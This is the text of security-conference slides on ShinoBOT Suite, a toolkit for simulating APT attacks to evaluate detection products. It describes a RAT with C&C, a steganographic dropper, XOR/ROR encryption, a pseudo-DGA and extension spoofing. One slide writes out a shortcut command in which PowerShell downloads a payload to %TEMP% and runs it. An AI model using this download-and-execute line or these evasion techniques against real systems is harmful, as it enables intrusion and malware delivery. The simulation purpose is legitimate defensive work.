1

Shota Shinogi @Sh1n0g1

http://shinosec.com

Security Researcher at Macnica Networks Corp.

Japanese Disty of security/network products

Enthusiast of writing (ethical) malware

Presented ShinoBOT (not Suite) last year at

Arsenal 2

ShinoBOT.exe

ShinoBOT is a RAT (simulator)

Presented at Black Hat USA 2013 Arsenal

It connects to ShinoC2, the C&C Server using HTTP(S).

What you can do with ShinoBOT via ShinoC2

Execute a command

Upload / Download a file

Take a screen shot

It is a SIMULATOR

it has a GUI

you need the password which is showed on the GUI to control it

3

ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly-sophisticated attack campaign.

What is contained

Exploit (Shortcut contains a malicious script)

Malware Delivery Server (ShinoMAL.mooo.com)

Downloader/Dropper (ShinoDownloader.exe)

RAT (ShinoBOT.exe)

C&C Server (ShinoC2]

Steganography, crypto, DGA and some evasion techniques

4

There is a bunch of new security tools to detect/response the unknown threat

Sandbox based Malware Detection System

ETDR (Endpoint Threat Detect & Response)

SIEM (Security Information & Event Manager)

Security Analytics / Network Forensics

It is hard to evaluate those new products

Known malware will be detected by signature

♦ ≠ Unknown Threat

To simulate a realistic APT

♦ requires a high skill

♦ takes too much time

♦ spends a lot of money using some commercial tools

5

Malicious

Shortcut

Downloader

Dropper RAT

Decoy File

C&C

Server

Malware

Deploy

Server

dldr_tmp

ShinoBOT.exe

5)Download

4)Open

8)C2 Communication 1)Download

2)Execute

img.jpg

3)Drop

6)Decrypt

7)Execute

6

Malicious

Shortcut

Downloader

Dropper RAT

Decoy File

C&C

Server

Malware

Deploy

Server

dldr_tmp

ShinoBOT.exe

5)Download

4)Open

8)C2 Communication 1)Download

2)Execute

img.jpg

3)Drop

6)Decrypt

7)Execute

7

8

9

10

11

12

13

Decoy File

ShinoBOT works in

background

14

To control ShinoBOT (RAT), you need to grab

the password, it is to prevent the abuse of

ShinoBOT.

ShinoBOT saved its password to the same

folder (C:¥Users¥%USERNAME%¥sb.pas)

You can access to the password word file

remotely. ¥¥%MACHINENAME%¥C$¥Users¥%USERNAME%¥sb.pas

15

To control ShinoBOT (RAT), you need to grab

the password, it is to prevent the abuse of

ShinoBOT.

ShinoBOT saved its password in this text file.

(C:¥Users¥%USERNAME%¥sb.pas)

You can access to the password word file

remotely. ¥¥%MACHINENAME%¥C$¥Users¥%USERNAME%¥sb.pas

This password protection is to prevent the real guys to abuse

ShinoBOT.

16

Access to ShinoBOT.com

Go to the host list

Your host will appear in the host list

Click the [View/Assign Jobs] link

17

Put the password to see the Loot (result) of the

command

Put the password to assign a new job

Malicious Shortcut

"target" of the shortcut (all in 1 line)

cmd.exe /c powershell (new objectSystem.Net.WebClient) .DownloadFile('DOWNLOADERURL', '%TEMP%¥LicenseRnd.txt'); & %TEMP%¥LicenseRnd.txt & ::DECOYFILENAME

POWERSHELL downloads the downloader, and save it

CMD executes the downloader(Rnd means random string)

CMD ignores this line because :: means a comment

18

Extension Spoofing

On the target of shortcut, there is the line

"%TEMP%¥LicenseRnd.txt" (previous slide)

Usually, when you double click the file with .txt,

the notepad will launch

CMD.exe can execute the executables(contains

the MZ header) with any extension

ShinoBOT Suite uses this techniques to spoof

the extension, and make the donwloader hard

to be found from the disk

Actually, it is the ShinoDownloader.exe

19

Crypto Stuff

ShinoBOT Suite uses XOR and ROR (4 bit rotate)

Key is used just for the XOR, and ROR is always 4

bits

ShinoBOT Suite generates a random key (200 ~

255 byte) so it is little bit difficult to decrypt the

whole file without having the key

20

Steganography

The encrypted RAT is hidden in the kitten image.

JPG data

Encrypted RAT

[Binary Visualizer]

21

22

Domain Generation Algorithm

ShinoBOT (the RAT) uses pseudo-DGA.

It generates a random host name for the C2

Server.

rrrr.r.shinobot.com

" r " is replaced by a random character.

The DNS of shinobot.com responds any host

with the C2 server IP address.

Exploit

ShellCode

Downloader

Dropper RAT

Decoy File

C&C

Server

Malware

Deploy

Server

KB1234567.exe

Invitation.pdf

Invitation.pdf (legitimate)

ShinoBOT.exe

5)Download

4)Open

8)C2 Communication 1)Download

2)Execute

img.jpg

3)Drop

KB1234567.exe

6)Decrypt

7)Execute

Phishing Email

23

Visit my site and get the

recipe of ShinoBOT SUITE.

http://shinosec.com

24